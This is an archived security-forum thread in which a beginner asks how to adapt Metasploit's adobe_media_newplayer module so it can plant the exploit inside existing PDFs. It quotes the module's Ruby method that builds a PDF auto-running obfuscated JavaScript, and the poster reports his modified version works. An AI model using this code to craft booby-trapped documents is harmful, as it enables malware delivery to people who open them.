Results 1 to 6 of 6

Thread: MSF : My first exploit

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010
    Location
    Quebec
    Posts
    3

    Question MSF : My first exploit

    Hi,

    This is my first post, so apologize for my english (i'm french).
    I discovered Backtrack about a year ago, and used it principally for WEP and WPA cracking techniques learning. Recently, I discovered this powerful tool called MSF. Beginning reading docs, tutos and testing on my own (and getting Ruby development basis, my background is more Java), I'm quite interested in PDF exploit because in my opinion, they are very dangerous (popular exchange format).

    This make me interested in recent adobe_media_newplayer exploit.
    I think I understand basically how it works, but I questioned myself on how will it be possible to fill up the PDF (instead of getting an empty one). This example may allow me to learn deeply ruby, with file editing, and adapt an exploit to my needs.

    End up with the introduction, and let's go for my problem :

    My first idea was to give an input PDF file, and to add it the exploit.
    So I studied this part of the adobe_media_newplayer.rb :
    Code:
    def make_pdf(js)
    
    		xref = []
    		eol = "\x0d\x0a"
    		endobj = "endobj" << eol
    
    		pdf = "%PDF-1.5" << eol
    		pdf << "%" << RandomNonASCIIString(4) << eol
    		xref << pdf.length
    		pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
    		xref << pdf.length
    		pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
    		xref << pdf.length
    		compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
    		pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    		pdf << "stream" << eol
    		pdf << compressed << eol
    		pdf << "endstream" << eol
    		pdf << endobj
    		xrefPosition = pdf.length
    		pdf << "xref" << eol
    		pdf << "0 %d" % (xref.length + 1) << eol
    		pdf << "0000000000 65535 f" << eol
    		xref.each do |index|
    			pdf << "%010d 00000 n" % index << eol
    		end
    		pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
    		pdf << "startxref" << eol
    		pdf << xrefPosition.to_s() << eol
    		pdf << "%%EOF" << eol
    
    	end
    To help me, I found another PDF exploit, that adds up a payload to an already crafted pdf file : adobe_pdf_embedded_exe.rb.

    So here is my questions :

    1. Is that possible and wouldn't it be better to rewrite the part presented above using Msf::Exploit::PDF_Parse to craft the file ?

    2. If so, is there a place where I can find some documentation about Msf::Exploit::PDF_Parse ? I'm already reading deeper the pdf format specifications but I have some trouble understanding all of this.

    3. May someone help me understanding (basically) what does this method do ? My ruby basis aren't sufficient I think :/
    def basic_social_engineering_exploit(xref_trailers,roo t_obj,stream,trailers,file_name,exe_name,startxref ) in adobe_pdf_embedded_exe.rb

    4. Last but not least, do I go in the right way ?

    See you !

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: MSF : My first exploit

    You might be better off asking these questions direct to the Metasploit Devs.

    From what I can tell after looking at this for about two minutes, PDF_Parse is used to Parse an existing PDF file, not to create a new one. The code you reproduced above is probably a good way to create a new PDF (since HDM was involved in writing that sploit Im assuming that this is the correct way to go about it ).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    6

    Default Re: MSF : My first exploit

    spool.metasploit.com Mailing Lists

    you can join this mail list. Hd,joshua or carlos r helping to others very quickly.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Location
    Quebec
    Posts
    3

    Default Re: MSF : My first exploit

    Thank you very much for your quick and precise answers (I was thinking my post would never be "posted" ).
    I'll ask directly Metasploit Devs.

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: MSF : My first exploit

    Didier Stevens has done a lot of work with PDF exploits in the past, you might find something helpful on his blog.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  6. #6
    Just burned his ISO
    Join Date
    Mar 2010
    Location
    Quebec
    Posts
    3

    Default Re: MSF : My first exploit

    Well, thank you for this. His blog gave me some search directions
    All your advices gave me my answer :
    1- Learn more about PDF format
    2- Increase my Ruby skills

    3- Try harder

    Thank you all !

    edit : Done ! The new exploit works correctly on pdf that aren't too complicated (encryption, etc...). I posted it using MSF's mailing list to see if the code can be cleaned, but it works though.
    Last edited by aemaeth; 04-02-2010 at 01:17 PM.

Similar Threads

  1. Exploit phpMyAdmin 2.10.1
    By matthttam in forum Experts Forum
    Replies: 4
    Last Post: 03-08-2010, 12:46 AM
  2. MS08_067_netapi exploit
    By khianhui in forum Beginners Forum
    Replies: 3
    Last Post: 03-03-2010, 03:02 AM
  3. Saint exploit
    By 259374 in forum Tool Requests
    Replies: 3
    Last Post: 02-27-2010, 12:17 AM
  4. Exploit database
    By av-35 in forum Beginners Forum
    Replies: 1
    Last Post: 02-19-2010, 07:33 PM
  5. Exploit help.
    By sickness in forum Beginners Forum
    Replies: 2
    Last Post: 02-03-2010, 11:15 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •